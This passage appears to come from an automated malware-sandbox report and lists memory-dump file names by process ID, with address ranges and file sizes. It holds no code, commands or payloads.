memory/3900-133-0x0000000000000000-mapping.dmp
-
memory/3900-134-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/3920-233-0x0000000000000000-mapping.dmp
-
memory/3920-329-0x0000000000000000-mapping.dmp
-
memory/4008-189-0x0000000000000000-mapping.dmp
-
memory/4024-182-0x0000000000000000-mapping.dmp
-
memory/4036-190-0x0000000000000000-mapping.dmp
-
memory/4128-484-0x0000000000000000-mapping.dmp
-
memory/4184-463-0x0000000000000000-mapping.dmp
-
memory/4192-188-0x0000000000000000-mapping.dmp
-
memory/4240-132-0x0000000000000000-mapping.dmp
-
memory/4248-494-0x0000000000000000-mapping.dmp
-
memory/4320-433-0x0000000000000000-mapping.dmp
-
memory/4388-186-0x0000000000000000-mapping.dmp
-
memory/4400-262-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/4400-260-0x0000000140002314-mapping.dmp
-
memory/4400-259-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/4400-264-0x00007FFA104F0000-0x00007FFA105AE000-memory.dmpFilesize
760KB
-
memory/4400-263-0x00007FFA11CD0000-0x00007FFA11EC5000-memory.dmpFilesize
2.0MB
-
memory/4400-267-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/4440-454-0x0000000000000000-mapping.dmp
-
memory/4460-247-0x00000000077D0000-0x0000000007CFC000-memory.dmpFilesize
5.2MB
-
memory/4460-239-0x00000000064C0000-0x00000000064DE000-memory.dmpFilesize
120KB
-
memory/4460-210-0x0000000005400000-0x000000000550A000-memory.dmpFilesize
1.0MB
-
memory/4460-211-0x0000000005330000-0x000000000536C000-memory.dmpFilesize
240KB
-
memory/4460-209-0x0000000002D70000-0x0000000002D82000-memory.dmpFilesize
72KB
-
memory/4460-208-0x0000000005910000-0x0000000005F28000-memory.dmpFilesize
6.1MB
-
memory/4460-201-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4460-254-0x0000000007050000-0x00000000070A0000-memory.dmpFilesize
320KB
-
memory/4460-200-0x0000000000000000-mapping.dmp
-
memory/4460-246-0x00000000070D0000-0x0000000007292000-memory.dmpFilesize
1.8MB
-
memory/4460-238-0x00000000061B0000-0x0000000006226000-memory.dmpFilesize
472KB
-
memory/4548-516-0x0000000000000000-mapping.dmp
-
memory/4608-226-0x0000000000000000-mapping.dmp
-
memory/4656-412-0x0000000000000000-mapping.dmp
-
memory/4704-152-0x0000000007780000-0x000000000779A000-memory.dmpFilesize
104KB
-
memory/4704-146-0x0000000005E50000-0x0000000005EB6000-memory.dmpFilesize
408KB
-
memory/4704-151-0x0000000007DC0000-0x000000000843A000-memory.dmpFilesize
6.5MB
-
memory/4704-150-0x0000000006A10000-0x0000000006A2E000-memory.dmpFilesize
120KB
-
memory/4704-158-0x0000000007B10000-0x0000000007B32000-memory.dmpFilesize
136KB
-
memory/4704-157-0x00000000079F0000-0x00000000079F8000-memory.dmpFilesize
32KB
-
memory/4704-149-0x0000000070B00000-0x0000000070B4C000-memory.dmpFilesize
304KB
-
memory/4704-148-0x0000000007610000-0x0000000007642000-memory.dmpFilesize
200KB
-
memory/4704-156-0x0000000007A00000-0x0000000007A1A000-memory.dmpFilesize
104KB
-
memory/4704-141-0x0000000000000000-mapping.dmp
-
memory/4704-147-0x0000000006460000-0x000000000647E000-memory.dmpFilesize
120KB
-
memory/4704-154-0x0000000007A40000-0x0000000007AD6000-memory.dmpFilesize
600KB
-
memory/4704-155-0x00000000079B0000-0x00000000079BE000-memory.dmpFilesize
56KB
-
memory/4704-142-0x0000000002E70000-0x0000000002EA6000-memory.dmpFilesize
216KB
-
memory/4704-145-0x0000000005D70000-0x0000000005DD6000-memory.dmpFilesize
408KB
-
memory/4704-144-0x0000000005590000-0x00000000055B2000-memory.dmpFilesize
136KB
-
memory/4704-159-0x00000000089F0000-0x0000000008F94000-memory.dmpFilesize
5.6MB
-
memory/4704-153-0x00000000077F0000-0x00000000077FA000-memory.dmpFilesize
40KB
-
memory/4704-143-0x00000000056D0000-0x0000000005CF8000-memory.dmpFilesize
6.2MB
-
memory/4712-437-0x0000000000000000-mapping.dmp
-
memory/4888-191-0x0000000000000000-mapping.dmp
-
memory/4912-197-0x0000000000000000-mapping.dmp
-
memory/4920-423-0x0000000000000000-mapping.dmp
-
memory/4976-249-0x0000026F5C610000-0x0000026F5C630000-memory.dmpFilesize
128KB
-
memory/4976-248-0x00007FF701612720-mapping.dmp
-
memory/4976-256-0x00007FF700E20000-0x00007FF701614000-memory.dmpFilesize
8.0MB
-
memory/4976-252-0x00007FF700E20000-0x00007FF701614000-memory.dmpFilesize
8.0MB
-
memory/4976-255-0x0000026F5D040000-0x0000026F5D060000-memory.dmpFilesize
128KB
-
memory/4992-342-0x0000000000000000-mapping.dmp
-
memory/5004-163-0x0000000000000000-mapping.dmp
-
memory/5028-244-0x00007FF737C914E0-mapping.dmp
-
memory/5036-227-0x0000000000000000-mapping.dmp
-
memory/5048-475-0x0000000000000000-mapping.dmp
-
memory/5048-346-0x0000000000000000-mapping.dmp
-
memory/5096-184-0x0000000000000000-mapping.dmp